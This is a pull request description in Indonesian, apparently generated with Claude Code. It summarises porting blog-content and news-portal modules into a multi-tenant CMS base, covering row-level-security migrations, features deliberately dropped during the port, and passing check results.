Port dua modul konten publik dari `awcms-mini` ke base `awcms` (mini-first, ADR-0034 template-dipakai-langsung), agar base ini punya surface CMS/portal publik pertamanya. Dua commit atomic.

## Modul yang diport

**`blog-content`** (commit 1) — manajemen blog/konten tenant-scoped: CRUD+lifecycle post/page (draft→review→scheduled/published→archived, soft-delete/restore/purge), kategori/tag hierarkis, full-text search PostgreSQL, revisi append-only, presentasi/monetisasi (template/menu/widget/ads/theme), auto internal-tag-linking, per-tenant settings. Rute publik `/blog/{tenantCode}/*` (ADR-0009): index, detail, arsip kategori/tag, search, RSS feed, sitemap.

**`news-portal`** (commit 2) — registry media R2 (upload presigned direct-to-R2), composer homepage-section editorial, ad-placement preset R2-only, job rekonsiliasi media. Adapter `news_media` NYATA menggantikan no-op yang di-stub blog-content saat port-time (pure composition-root swap, kode blog-content tak disentuh).

## Migrasi

`sql/035`–`sql/045` (11 migrasi, 19 tabel tenant-scoped). **Setiap tabel `ENABLE` + `FORCE ROW LEVEL SECURITY`** + policy `tenant_isolation` — divalidasi terhadap PostgreSQL 18.4 nyata (apply berurutan 001→045, `relforcerowsecurity=t`, isolasi cross-tenant nyata sebagai role non-owner `awcms_app`). Additive murni: tak mengubah tabel yang sudah ada.

## Port-time drops (didokumentasikan, bukan senyap)

- Rute host-resolved `/news/**` — butuh modul `tenant_domain` (belum diport). Rute publik path-based `/blog/{tenantCode}` dipertahankan.
- Full-online-R2-only mode enforcement & social-publishing outbox trigger — modul terkait belum diport; adapter no-op fail-safe.
- CSP `frame-src` YouTube (video_news block) — tak dilonggarkan demi jaminan "zero third-party CSP origin di LAN/offline"; didokumentasikan sebagai known-limitation.

## Verifikasi (DoD penuh hijau)

`bun run check` chain: **1721 pass / 206 skip / 0 fail**, build complete. Termasuk lint, typecheck, api:spec:check, modules:dag:check, modules:compose:check, family:conformance:check (27/27), logging:lint:check, check:docs, api:docs:check. Test unit/domain diport (31 file); integration test DB-gated dilewati (dicatat), digantikan validasi RLS/grant/generated-column terhadap Postgres nyata.

## File di luar modul

`src/modules/index.ts` (registrasi), `identity-access/domain/access-control.ts` (+`schedule`/`preview`/`verify` ke AccessAction), `scripts/security-readiness.ts` (WORKER_ROLE_GRANTS drift-parity), `package.json` (+2 job script), 3 test registry/allow-list, artefak OpenAPI/inventory (regen).

🤖 Generated with [Claude Code](https://claude.com/claude-code)
